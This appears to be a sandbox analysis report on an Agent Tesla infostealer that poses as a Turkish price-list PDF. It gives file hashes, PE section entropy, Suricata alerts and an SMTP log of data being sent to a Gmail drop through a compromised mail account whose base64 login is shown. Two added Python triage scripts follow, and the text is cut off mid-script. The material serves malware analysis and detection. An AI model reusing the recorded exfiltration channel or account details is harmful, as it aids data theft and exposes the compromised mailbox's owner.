                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                          Process:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1172
                                          Entropy (8bit):5.357042452875322
                                          Encrypted:false
                                          SSDEEP:24:3CytZWSKco4KmZjKbm51s4RPT6moUebIKo+mZ9t7J0gt/NKIl9r+q:yyjWSU4xymI4RfoUeW+mZ9tK8ND3
                                          MD5:827C68C8F65D2B0800E6791B34AB6D2E
                                          SHA1:151BC96F9C26C53E02D2E0DA64995A462D0C3B4E
                                          SHA-256:6B22A727792EC2ACE1BC27BF00BECBBD842902F2FD0FC813CF45A21A986377D5
                                          SHA-512:67E9E89C531B2CDF47FCBBA3F036EA66427631A8EBF287A26DD35AFB114AF6E2D945304CBF72B94358245FEED658F9BA6E19B29879AE6488D8DC7A143DCC146D
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):644608
                                          Entropy (8bit):7.8542747881664
                                          Encrypted:false
                                          SSDEEP:12288:cuC2m4rN+8ExBdBT+EOukJEmrxsZ7oFgfiKZUzXrDOGdtTJ1:ct2BrN+8Ex9xIBFwGgfiOKXP
                                          MD5:5B35E1E6CDF0D5277FA8DCCD5FC06D26
                                          SHA1:AE1F7A5ECE26C423477FBB6048DB707DF4013CB6
                                          SHA-256:F7D4EED71F2BDB8AC845990506C335BB64AF5877DF1925794B000D4A7CF88B84
                                          SHA-512:A55F814EB38F8256529BCE371E46BD8801ABC90AEF844768D28D4C9D544084AA57AA421347BA8CEAD0F01DA08E27DAAD76FE04A65B6B7ED754256091CCAD6A44
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 29%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X................0.............j.... ........@.. .......................@............@.....................................O............................ ..........p............................................ ............... ..H............text...p.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................K.......H........]...3......#.......B............................................{....*"..}....*....0..f...........3...%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.%..r...p.}.....(.....*...0.._........s....}.....s....}......}.....(.......(......{....(.......{....(......{....(.......{....(.....*..0............{....r...po.......o.....+d..(.......{......3...%..oB....%.r...p.%..oF......(.....%.r...p.%..oD......(.....%.(.....(....o........(....-...........o ...
                                          Process:C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Preview:[ZoneTransfer]....ZoneId=0
                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.8542747881664
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:26.09 01.10.2024Fiyat Listesi.pdf.exe
                                          File size:644'608 bytes
                                          MD5:5b35e1e6cdf0d5277fa8dccd5fc06d26
                                          SHA1:ae1f7a5ece26c423477fbb6048db707df4013cb6
                                          SHA256:f7d4eed71f2bdb8ac845990506c335bb64af5877df1925794b000d4a7cf88b84
                                          SHA512:a55f814eb38f8256529bce371e46bd8801abc90aef844768d28d4c9d544084aa57aa421347ba8cead0f01da08e27daad76fe04a65b6b7ed754256091ccad6a44
                                          SSDEEP:12288:cuC2m4rN+8ExBdBT+EOukJEmrxsZ7oFgfiKZUzXrDOGdtTJ1:ct2BrN+8Ex9xIBFwGgfiOKXP
                                          TLSH:A4D41295251EDA23E0A717F902A1D2B45375AECC6112D2476FDA3DFF3C2A36828407A7
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.................0.............j.... ........@.. .......................@............@................................
                                          Icon Hash:90cececece8e8eb0
                                          Entrypoint:0x49eb6a
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0xD684D858 [Tue Jan 18 10:39:20 2084 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al (repeated 78 times: the bytes following the entry-point jump are zero padding, which disassembles as this instruction)
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
Data directories
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_IMPORT          0x9eb17          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xa0000          0x5bc         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xa2000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x9d4b0          0x70          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0           -

Sections
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0x9cb70       0x9cc00   937e4efb250fa01a5f32d69ec26a11ff  False     0.9375186901913876  data       7.861932673509319    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xa0000          0x5bc         0x600     a2eacd14af81a8bc99cb0da290f7897e  False     0.421875            data       4.100842672140593    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xa2000          0xc           0x200     6ab9b32799089c668e771bdb4e2387e2  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources
Name         RVA      Size   Type                                                                               Language  Country  ZLIB Complexity
RT_VERSION   0xa0090  0x32c  data                                                                               -         -        0.42980295566502463
RT_MANIFEST  0xa03cc  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators  -         -        0.5489795918367347

Imports
DLL          Import
mscoree.dll  _CorExeMain
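The section table is the first thing to check on a sample like this, and the check is easy to automate. The .text section holds 0x9cc00 raw bytes of a 644'608-byte file at 7.86 bits per byte, in an assembly whose only import is mscoree.dll!_CorExeMain, so the managed code that actually runs is not on disk in readable form; it is decrypted or decompressed at run time. The script below is an added example (my code, not Joe Sandbox's and not the sample's) that parses a PE section table with the standard library only, computes per-section Shannon entropy, decodes the IMAGE_SCN_* characteristics the report lists, and flags executable sections above an assumed 7.0 bits/byte threshold. It runs on a constructed minimal PE from build_sample_pe(); parse_sections() accepts the bytes of any real PE file.

```python
"""Section-entropy triage for a PE file, standard library only.

Added example, not Joe Sandbox code. parse_sections() reads the DOS header,
PE signature, COFF header and section table of any PE image given as bytes;
suspicious_sections() flags executable sections whose raw bytes have
near-maximal entropy, the pattern of the .text section in the report
(0x9cc00 raw bytes at 7.86 bits/byte in a file whose only import is
mscoree.dll!_CorExeMain). The 7.0 threshold and the sample PE built by
build_sample_pe() are the author's assumptions for the demo.
"""
import math
import struct
from collections import Counter

# Subset of IMAGE_SCN_* characteristics, enough to reproduce the report's column.
SECTION_FLAGS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x02000000: "IMAGE_SCN_MEM_DISCARDABLE",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}
PACKED_ENTROPY = 7.0  # assumed threshold: plain native or IL code usually sits well below this


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant input, 8.0 for a uniform distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def decode_characteristics(value: int) -> list:
    """Flag names in ascending bit order, the order the report prints them in."""
    return [name for bit, name in sorted(SECTION_FLAGS.items()) if value & bit]


def parse_sections(pe: bytes) -> list:
    """Return one dict per section header, with the entropy of its raw data."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, e_lfanew + 4)
    table = e_lfanew + 4 + 20 + opt_size  # section headers follow the optional header
    sections = []
    for i in range(nsections):
        (name, vsize, va, rawsize, rawptr,
         _, _, _, _, chars) = struct.unpack_from("<8sIIIIIIHHI", pe, table + 40 * i)
        raw = pe[rawptr:rawptr + rawsize]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va, "virtual_size": vsize, "raw_size": rawsize,
            "entropy": shannon_entropy(raw),
            "characteristics": decode_characteristics(chars),
        })
    return sections


def suspicious_sections(pe: bytes) -> list:
    """Names of executable sections that look encrypted or compressed."""
    return [s["name"] for s in parse_sections(pe)
            if "IMAGE_SCN_MEM_EXECUTE" in s["characteristics"] and s["entropy"] >= PACKED_ENTROPY]


def build_sample_pe() -> bytes:
    """Constructed minimal PE: a uniform-byte .text (entropy 8.0) and an all-zero .rsrc (0.0)."""
    text_data = bytes(range(256)) * 2  # every byte value exactly twice
    rsrc_data = bytes(0x200)
    text_ptr, rsrc_ptr = 0x200, 0x400

    def section(name, va, data, ptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, len(data), va, len(data), ptr, 0, 0, 0, 0, chars)

    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0x0102)  # i386, 2 sections, no optional header
    headers = (bytes(dos) + b"PE\0\0" + coff
               + section(b".text", 0x2000, text_data, text_ptr, 0x60000020)   # CODE|EXECUTE|READ
               + section(b".rsrc", 0x4000, rsrc_data, rsrc_ptr, 0x40000040))  # INITIALIZED_DATA|READ
    image = bytearray(rsrc_ptr + len(rsrc_data))
    image[:len(headers)] = headers
    image[text_ptr:text_ptr + len(text_data)] = text_data
    image[rsrc_ptr:rsrc_ptr + len(rsrc_data)] = rsrc_data
    return bytes(image)


if __name__ == "__main__":
    sample = build_sample_pe()
    for s in parse_sections(sample):
        print(f"{s['name']:<8} VA=0x{s['virtual_address']:x} raw=0x{s['raw_size']:x} "
              f"entropy={s['entropy']:.2f}  {', '.join(s['characteristics'])}")
    print("suspicious:", suspicious_sections(sample))
```

Run it against the submitted file by passing open(path, "rb").read() to suspicious_sections(); on this sample the expected result is [".text"]. High entropy alone does not prove malice (signed installers and compressed resources score high too), which is why the rule is restricted to executable sections: legitimate .NET assemblies keep their IL in .text at well under 7 bits per byte.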
Suricata IDS alerts
Timestamp                        SID      Signature                                                           Severity  Source IP    Src Port  Dest IP          Dst Port  Protocol
2024-09-26T11:24:39.741265+0200  2855542  ETPRO MALWARE Agent Tesla CnC Exfil Activity                        1         192.168.2.4  63220     108.167.140.123  587       TCP
2024-09-26T11:26:17.627129+0200  2030171  ET MALWARE AgentTesla Exfil Via SMTP                                1         192.168.2.4  63220     108.167.140.123  587       TCP
2024-09-26T11:26:17.627129+0200  2839723  ETPRO MALWARE Win32/Agent Tesla SMTP Activity                       1         192.168.2.4  63220     108.167.140.123  587       TCP
2024-09-26T11:26:17.627129+0200  2840032  ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2  1         192.168.2.4  63220     108.167.140.123  587       TCP
TCP packets
Timestamp                             Src Port  Dst Port  Source IP        Dest IP
Sep 26, 2024 11:24:37.612973928 CEST  63219     587       192.168.2.4      108.167.140.123
Sep 26, 2024 11:24:37.617922068 CEST  587       63219     108.167.140.123  192.168.2.4
Sep 26, 2024 11:24:37.618004084 CEST  63219     587       192.168.2.4      108.167.140.123
Sep 26, 2024 11:24:38.009836912 CEST  63219     587       192.168.2.4      108.167.140.123
Sep 26, 2024 11:24:38.015001059 CEST  587       63219     108.167.140.123  192.168.2.4
Sep 26, 2024 11:24:38.017266035 CEST  63219     587       192.168.2.4      108.167.140.123
Sep 26, 2024 11:24:38.032860994 CEST  63220     587       192.168.2.4      108.167.140.123
Sep 26, 2024 11:24:38.037813902 CEST  587       63220     108.167.140.123  192.168.2.4
Sep 26, 2024 11:24:38.038160086 CEST  63220     587       192.168.2.4      108.167.140.123
Sep 26, 2024 11:24:38.607897043 CEST  587       63220     108.167.140.123  192.168.2.4
Sep 26, 2024 11:24:38.608777046 CEST  63220     587       192.168.2.4      108.167.140.123
Sep 26, 2024 11:24:38.614748001 CEST  587       63220     108.167.140.123  192.168.2.4
Sep 26, 2024 11:24:38.767947912 CEST  587       63220     108.167.140.123  192.168.2.4
Sep 26, 2024 11:24:38.768984079 CEST  63220     587       192.168.2.4      108.167.140.123
Sep 26, 2024 11:24:38.773930073 CEST  587       63220     108.167.140.123  192.168.2.4
Sep 26, 2024 11:24:38.936256886 CEST  587       63220     108.167.140.123  192.168.2.4
Sep 26, 2024 11:24:38.936496019 CEST  63220     587       192.168.2.4      108.167.140.123
Sep 26, 2024 11:24:38.941317081 CEST  587       63220     108.167.140.123  192.168.2.4
Sep 26, 2024 11:24:39.210664034 CEST  587       63220     108.167.140.123  192.168.2.4
Sep 26, 2024 11:24:39.210889101 CEST  63220     587       192.168.2.4      108.167.140.123
Sep 26, 2024 11:24:39.215954065 CEST  587       63220     108.167.140.123  192.168.2.4
Sep 26, 2024 11:24:39.370055914 CEST  587       63220     108.167.140.123  192.168.2.4
Sep 26, 2024 11:24:39.370333910 CEST  63220     587       192.168.2.4      108.167.140.123
Sep 26, 2024 11:24:39.375215054 CEST  587       63220     108.167.140.123  192.168.2.4
Sep 26, 2024 11:24:39.580622911 CEST  587       63220     108.167.140.123  192.168.2.4
Sep 26, 2024 11:24:39.582499981 CEST  63220     587       192.168.2.4      108.167.140.123
Sep 26, 2024 11:24:39.587524891 CEST  587       63220     108.167.140.123  192.168.2.4
Sep 26, 2024 11:24:39.740593910 CEST  587       63220     108.167.140.123  192.168.2.4
Sep 26, 2024 11:24:39.741209984 CEST  63220     587       192.168.2.4      108.167.140.123
Sep 26, 2024 11:24:39.741265059 CEST  63220     587       192.168.2.4      108.167.140.123
Sep 26, 2024 11:24:39.741292000 CEST  63220     587       192.168.2.4      108.167.140.123
Sep 26, 2024 11:24:39.742953062 CEST  63220     587       192.168.2.4      108.167.140.123
Sep 26, 2024 11:24:39.746166945 CEST  587       63220     108.167.140.123  192.168.2.4
Sep 26, 2024 11:24:39.746185064 CEST  587       63220     108.167.140.123  192.168.2.4
Sep 26, 2024 11:24:39.746196985 CEST  587       63220     108.167.140.123  192.168.2.4
Sep 26, 2024 11:24:39.747752905 CEST  587       63220     108.167.140.123  192.168.2.4
Sep 26, 2024 11:24:40.067194939 CEST  587       63220     108.167.140.123  192.168.2.4
Sep 26, 2024 11:24:40.118987083 CEST  63220     587       192.168.2.4      108.167.140.123
Sep 26, 2024 11:26:17.260062933 CEST  63220     587       192.168.2.4      108.167.140.123
Sep 26, 2024 11:26:17.264921904 CEST  587       63220     108.167.140.123  192.168.2.4
Sep 26, 2024 11:26:17.626883030 CEST  587       63220     108.167.140.123  192.168.2.4
Sep 26, 2024 11:26:17.627039909 CEST  587       63220     108.167.140.123  192.168.2.4
Sep 26, 2024 11:26:17.627043009 CEST  63220     587       192.168.2.4      108.167.140.123
Sep 26, 2024 11:26:17.627129078 CEST  63220     587       192.168.2.4      108.167.140.123
Sep 26, 2024 11:26:17.631949902 CEST  587       63220     108.167.140.123  192.168.2.4
UDP packets
Timestamp                             Src Port  Dst Port  Source IP     Dest IP
Sep 26, 2024 11:23:44.846980095 CEST  53        51546     162.159.36.2  192.168.2.4
Sep 26, 2024 11:23:45.362792015 CEST  53        62941     1.1.1.1       192.168.2.4
Sep 26, 2024 11:24:37.234458923 CEST  60773     53        192.168.2.4   1.1.1.1
Sep 26, 2024 11:24:37.606357098 CEST  53        60773     1.1.1.1       192.168.2.4

DNS queries
Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name               Type            Class        DNS over HTTPS
Sep 26, 2024 11:24:37.234458923 CEST  192.168.2.4  1.1.1.1  0xb0a8    Standard query (0)  mail.musabody.com  A (IP address)  IN (0x0001)  false

DNS answers
Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name               CName  Address          Type            Class        DNS over HTTPS
Sep 26, 2024 11:24:37.606357098 CEST  1.1.1.1    192.168.2.4  0xb0a8    No error (0)  mail.musabody.com  -      108.167.140.123  A (IP address)  IN (0x0001)  false
SMTP conversation (192.168.2.4:63220 <-> 108.167.140.123:587)
Timestamp                             Direction  Commands
Sep 26, 2024 11:24:38.607897043 CEST  server     220-gator4156.hostgator.com ESMTP Exim 4.96.2 #2 Thu, 26 Sep 2024 04:24:38 -0500
                                                 220-We do not authorize the use of this system to transport unsolicited,
                                                 220 and/or bulk e-mail.
Sep 26, 2024 11:24:38.608777046 CEST  client     EHLO 675052
Sep 26, 2024 11:24:38.767947912 CEST  server     250-gator4156.hostgator.com Hello 675052 [8.46.123.33]
                                                 250-SIZE 52428800
                                                 250-8BITMIME
                                                 250-PIPELINING
                                                 250-PIPECONNECT
                                                 250-AUTH PLAIN LOGIN
                                                 250-STARTTLS
                                                 250 HELP
Sep 26, 2024 11:24:38.768984079 CEST  client     AUTH login dmljdG9yaWFAbXVzYWJvZHkuY29t
Sep 26, 2024 11:24:38.936256886 CEST  server     334 UGFzc3dvcmQ6
Sep 26, 2024 11:24:39.210664034 CEST  server     235 Authentication succeeded
Sep 26, 2024 11:24:39.210889101 CEST  client     MAIL FROM:<victoria@musabody.com>
Sep 26, 2024 11:24:39.370055914 CEST  server     250 OK
Sep 26, 2024 11:24:39.370333910 CEST  client     RCPT TO:<pritchardchristopher281@gmail.com>
Sep 26, 2024 11:24:39.580622911 CEST  server     250 Accepted
Sep 26, 2024 11:24:39.582499981 CEST  client     DATA
Sep 26, 2024 11:24:39.740593910 CEST  server     354 Enter message, ending with "." on a line by itself
Sep 26, 2024 11:24:39.742953062 CEST  client     .
Sep 26, 2024 11:24:40.067194939 CEST  server     250 OK id=1stkjn-0028iQ-27
Sep 26, 2024 11:26:17.260062933 CEST  client     QUIT
Sep 26, 2024 11:26:17.626883030 CEST  server     221 gator4156.hostgator.com closing connection
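The exchange above is the whole exfiltration channel, and three details in it matter for response. The AUTH LOGIN initial response is base64 for victoria@musabody.com, the same mailbox as MAIL FROM, so the musabody.com account is the relay and the RCPT TO Gmail address is the drop; the server offered STARTTLS but the client never issued it, so the credential and any stolen data crossed port 587 in the clear; and the client's reply to the 334 "Password:" challenge is absent from the captured command list, so the password cannot be recovered from this table. The script below is an added example, not Joe Sandbox code: it replays the conversation from a constructed transcript (the report's lines with C:/S: direction markers added) and implements the AUTH LOGIN challenge/response state machine in the general case, so it also handles a client that sends no initial response and waits for a "Username:" challenge. The key names of the returned dict are my choice.

```python
"""Triage of an SMTP exfiltration capture.

Added example, not Joe Sandbox code. TRANSCRIPT is a constructed copy of the
SMTP conversation in the report with 'C:'/'S:' direction markers added;
triage_smtp() follows the AUTH LOGIN challenge/response state machine
(username either as an initial response or after a 334 "Username:"
challenge, password after a 334 "Password:" challenge) and collects the
fields an incident responder needs first. The key names in the returned
dict are the author's choice.
"""
import base64
import binascii

TRANSCRIPT = """\
S: 220-gator4156.hostgator.com ESMTP Exim 4.96.2 #2 Thu, 26 Sep 2024 04:24:38 -0500
S: 220-We do not authorize the use of this system to transport unsolicited,
S: 220 and/or bulk e-mail.
C: EHLO 675052
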